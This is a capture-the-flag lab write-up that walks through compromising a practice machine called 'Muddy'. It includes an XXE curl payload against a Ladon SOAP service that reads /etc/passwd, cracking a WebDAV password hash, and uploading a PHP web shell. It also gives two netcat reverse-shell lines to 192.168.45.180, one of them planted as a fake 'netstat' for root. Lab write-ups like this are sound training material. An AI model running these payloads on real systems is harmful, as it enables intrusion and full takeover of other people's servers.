Muddy (easy)

[WDavid404]

Key points:

• Ladon server ---> https://www.exploit-db.com/exploits/43113
• webdav passwd.dav -> credential info --> upload php reverse file to webdav with the credential info
• PE: path is /dev/thm and root will run netstat

[WDavid404]

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp   open  smtp       syn-ack ttl 61 Exim smtpd
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://muddy.ugc/
111/tcp  open  rpcbind    syn-ack ttl 61 2-4 (RPC #100000)
443/tcp  open  tcpwrapped syn-ack ttl 61
908/tcp  open  unknown    syn-ack ttl 61
8888/tcp open  http       syn-ack ttl 61 WSGIServer 0.1 (Python 2.7.16)
|_http-title: Ladon Service Catalog
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: WSGIServer/0.1 Python/2.7.16

sudo vi /etc/hosts --> add muddy.ugc

80/tcp port: --> wordpress wpscan --url http://muddy.ugc/ -e u, ap --api-token=xxx --> reported some issue but not sure if they works.

8888/tcp port ---> Powered by Ladon for Python search ladon exploit --> https://www.exploit-db.com/exploits/43113

Based on the description of the exploit above, use

curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://muddy.ugc:8888/muddy/soap11/checkout\"' \
--data-binary $'<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:muddy\"><soapenv:Header/><soapenv:Body>
<urn:checkout soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">&passwd;</uid>
</urn:checkout></soapenv:Body></soapenv:Envelope>' \
'http://muddy.ugc:8888/muddy/soap11' | xmllint --format -

-->

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
ian:x:1000:1000::/home/ian:/bin/sh    <--------user name
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
_rpc:x:108:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:109:65534::/var/lib/nfs:/usr/sbin/nologin

Try to read some files but didn't work

/home/ian/.ssh/id_rsa  
/home/ian/.ssh/id_rsa.pub
/var/www/html/wp-config.php

gobuster dir -u http://muddy.ugc/ -w /usr/share/wordlists/dirb/common.txt -t 5 --> /webdav

Try to read webdav config file ( /var/www/html/webdav/passwd.dav)

Regards "$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0", https://hashcat.net/wiki/doku.php?id=example_hashes --> m=1600, Apache $apr1$ MD --> hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
--> sleepless

curl -T 'php_reverse_me1.php' 'http://muddy.ugc/webdav' -u 'administrant:sleepless'

### php_reverse_me1.php
<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.180 443 > /tmp/f");
?>

Access http://muddy.ugc/webdav/php_reverse_me1.php --> Get a reverse shell from the target host

linpeas: -->

cd /dev/thm
echo “nc 192.168.45.180 4444 -e /bin/bash” > netstat
chmod +x netstat

Got a reverse shell as root user